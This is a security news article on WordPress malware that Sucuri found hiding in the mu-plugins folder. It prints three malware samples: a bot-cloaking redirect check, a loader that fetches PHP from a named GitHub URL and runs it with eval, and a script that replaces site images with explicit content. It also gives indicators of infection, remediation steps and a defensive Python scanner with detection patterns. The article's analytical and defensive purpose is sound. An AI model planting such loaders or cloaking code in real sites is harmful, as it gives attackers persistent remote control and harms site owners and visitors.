Stealthy WordPress Malware Exploits Mu-Plugins Directory
Attackers are hiding malware in WordPress mu-plugins, bypassing detection and gaining persistent access. Learn how it works and how to secure your site.
Security researchers at Sucuri have uncovered a new wave of WordPress malware that leverages one of the platform's lesser-known features: the mu-plugins directory. This attack vector, long overlooked in many WordPress security audits, is now being exploited to deliver malware that is stealthy, persistent, and difficult to remove.
The discovery highlights how attackers are evolving their techniques to stay hidden from both administrators and automated security tools. By embedding malware in the Must-Use plugins folder, a location that loads automatically and isn’t visible from the WordPress plugin dashboard, threat actors gain long-term access with minimal chance of detection.
What Are Mu-Plugins, and Why Do They Matter?
Must-Use plugins, or mu-plugins, are a WordPress feature that allows certain plugins to run automatically without the need for activation through the admin interface. They live in a specific folder: /wp-content/mu-plugins/. Unlike standard plugins, these are loaded on every request and do not appear in the plugin UI, making them an ideal place for malware to hide.
Sucuri’s incident response team has identified three distinct strains of malware exploiting this exact mechanism. Each has a different function, but they share a goal: persistence and control.
Three Flavors of Malware Targeting Mu-Plugins
1. Fake Update Redirection Malware
The first malware sample Sucuri uncovered is designed to conditionally redirect site visitors to malicious external domains, depending on who they are.
The code — located in wp-content/mu-plugins/redirect.php — includes a function to detect bots and administrators. If the user is determined to be a bot (like Googlebot or Bingbot), the redirection is skipped to avoid detection by search engines or monitoring tools.
```php
// Cloaking check from the sample: skip the redirect when the visitor looks like a crawler.
function is_bot() {
    // List truncated in the original. Note that the user agent is lowercased below,
    // so the mixed-case entries ('Googlebot', 'YandexBot', ...) never match as written.
    $bot_agents = ['bot', 'crawl', 'spider', 'Googlebot', 'bingbot', 'Baiduspider', 'YandexBot', /* ... */];
    $user_agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
    foreach ($bot_agents as $bot) {
        if (strpos($user_agent, $bot) !== false) {
            return true;
        }
    }
    return false;
}
```
For regular site visitors, however, the script redirects them to a malicious domain — updatesnow[.]net — likely hosting malware or phishing pages. This behavior not only compromises user trust but can also result in blacklisting by Google Safe Browsing or other reputation services.
2. Remote Code Execution via Webshell
The second malware variant is far more insidious. Disguised as a core plugin file (./wp-content/mu-plugins/index.php), it provides remote code execution capabilities by downloading and executing a PHP script from GitHub.
This means attackers don’t need to continuously update the infected site — they can update their malicious payload remotely, and it will be reloaded every time WordPress runs.
```php
// Loader from the sample: fetch a remote PHP file on every request and execute it.
$externalResource = "https://raw.githubusercontent.com/starkvps99812/upd/refs/heads/main/BypassBest.php";
$retrievedCode = curl_exec(curl_init($externalResource));
// The "?>" prefix closes PHP mode so the fetched file can start with its own "<?php" tag.
eval("?>" . $retrievedCode);
```
This type of setup allows dynamic payload switching and virtually unlimited control over the site — from uploading backdoors and keyloggers to deploying crypto miners or launching lateral attacks on shared hosting environments.
3. Spam Injector and Link Hijacker
The third and final variant identified is a spam injection script found in custom-js-loader.php within the mu-plugins directory. It employs JavaScript to deface the website by replacing all image elements with explicit content hosted on a CDN, and intercepts outbound links to redirect users to popups or spam domains.
```javascript
// Defacement routine from the sample: every <img> on the page is pointed at one hosted file.
document.querySelectorAll("img").forEach(link => {
    link.src = "https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2022/02/23/26777510.gif";
});
```
In addition to the reputational harm this causes, such attacks can get domains blacklisted by ad networks and search engines, reducing traffic and ad revenue dramatically. This type of campaign is often tied to blackhat SEO tactics or monetized scam networks.
Signs of Infection
Sucuri notes several indicators that may suggest a WordPress site has been compromised in this way:
- Users are redirected to unfamiliar websites
- Suspicious PHP or JS files appear in /wp-content/mu-plugins/
- Increased server resource usage without traffic spikes
- Unauthorized admin accounts in the WordPress backend
- Changes to image content or outbound links
These signs are often subtle or attributed to plugin conflicts, allowing malware to persist longer before detection.
How Are Attackers Getting In?
While Sucuri doesn’t name a single root cause for these infections, several common attack vectors are likely at play:
- Outdated or vulnerable plugins/themes: exploiting known CVEs to write files into the mu-plugins directory
- Stolen admin credentials: gaining backend access to manually deploy malicious files
- Poor hosting hygiene: weak file permissions or shared server misconfigurations that allow lateral movement
Once inside, attackers use the mu-plugins mechanism to ensure their payload is loaded early in the WordPress execution chain and reloaded after any cleanup effort unless the mu-plugins folder is specifically reviewed.
What Site Owners Should Do
Sucuri recommends a multi-step approach to detect and remediate infections in the mu-plugins folder:
- Scan the entire WordPress installation — especially /wp-content/mu-plugins/ — for unfamiliar files.
- Audit all admin accounts and remove any that look suspicious.
- Review the list of active plugins and remove anything that wasn’t intentionally installed.
- Update WordPress core, plugins, and themes to their latest versions.
- Change all admin passwords and enable two-factor authentication (2FA).
- Deploy a file integrity monitoring system or use a security plugin to alert on unexpected changes.
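The mu-plugins scan and the file integrity check from the list above, combined in one script. This is an added example, not Sucuri's tooling or the article's own code: it baselines a known-clean /wp-content/mu-plugins/ by file digest, then reports files that are new, modified or deleted and flags the strings the three samples on this page rely on (user-agent cloaking, remote fetch plus eval, image and link hijacking). The demo() walk-through builds a constructed directory in a temp folder with placeholder content.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Strings the three samples on this page rely on: UA cloaking, remote fetch + eval, DOM hijack.
RISK_PATTERNS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "remote_fetch": re.compile(r"curl_exec|file_get_contents\s*\(\s*['\"]https?://", re.I),
    "raw_github": re.compile(r"raw\.githubusercontent\.com", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:|wp_redirect\s*\(", re.I),
    "ua_cloak": re.compile(r"HTTP_USER_AGENT", re.I),
    "dom_hijack": re.compile(r"querySelectorAll\s*\(\s*['\"](img|a)['\"]", re.I),
}

def sha256_file(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline(mu_dir):
    """Record a digest for every file while the directory is known-clean."""
    return {str(p.relative_to(mu_dir)): sha256_file(p)
            for p in Path(mu_dir).rglob("*") if p.is_file()}

def scan_mu_plugins(mu_dir, baseline):
    """Report files new/modified/deleted vs the baseline, or matching a risky pattern."""
    mu_dir, seen, findings = Path(mu_dir), set(), []
    for p in sorted(mu_dir.rglob("*")):
        if not p.is_file():
            continue
        rel = str(p.relative_to(mu_dir))
        seen.add(rel)
        status = "new" if rel not in baseline else "modified" if baseline[rel] != sha256_file(p) else "unchanged"
        hits = [n for n, rx in RISK_PATTERNS.items() if rx.search(p.read_text(errors="replace"))]
        if status != "unchanged" or hits:
            findings.append({"file": rel, "status": status, "patterns": hits})
    findings += [{"file": rel, "status": "deleted", "patterns": []} for rel in baseline.keys() - seen]
    return findings

def demo():
    """Constructed walk-through: baseline one legitimate file, then plant two files modelled on the samples."""
    root = Path(tempfile.mkdtemp())
    (root / "force-ssl.php").write_text("<?php\n// legitimate mu-plugin (constructed)\nadd_filter('https_ssl_verify', '__return_true');\n")
    baseline = build_baseline(root)
    (root / "redirect.php").write_text("<?php\n$ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');\n"
        "if (strpos($ua, 'bot') === false) { header('Location: https://example.invalid/'); }\n")
    (root / "index.php").write_text("<?php\n$src = 'https://raw.githubusercontent.com/PLACEHOLDER/x.php';\n"
        "eval('?>' . curl_exec(curl_init($src)));\n")
    return {f["file"]: f for f in scan_mu_plugins(root, baseline)}
```

Run build_baseline() once against a verified-clean directory and store the result off the web server; run scan_mu_plugins() on a schedule and treat any "new", "modified" or "deleted" entry as a change to investigate, since a legitimate mu-plugin rarely changes on its own.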
Additionally, implementing a web application firewall (WAF) can help block malicious file uploads and remote code execution attempts before they reach the WordPress backend.
Why This Attack Vector Works
What makes this campaign particularly dangerous is how well it blends into WordPress’s normal behavior. Must-Use plugins are intended for legitimate use cases, such as forcing specific performance or security plugins to load early. But their quiet, automatic execution creates an opportunity for abuse.
By abusing mu-plugins, attackers bypass dashboard visibility, security plugins that only monitor standard plugin directories, and many manual inspection processes.
The Takeaway
This isn’t the first time attackers have targeted overlooked parts of WordPress installations — but it’s one of the more effective uses of native functionality to maintain stealth. The rise in abuse of the mu-plugins directory should serve as a wake-up call for developers, administrators, and security teams.
If your WordPress security strategy doesn’t include routine checks of auto-loading plugin directories, now is the time to update your playbook.
As attackers continue to innovate, defenders need to think like them — and monitor the paths less traveled.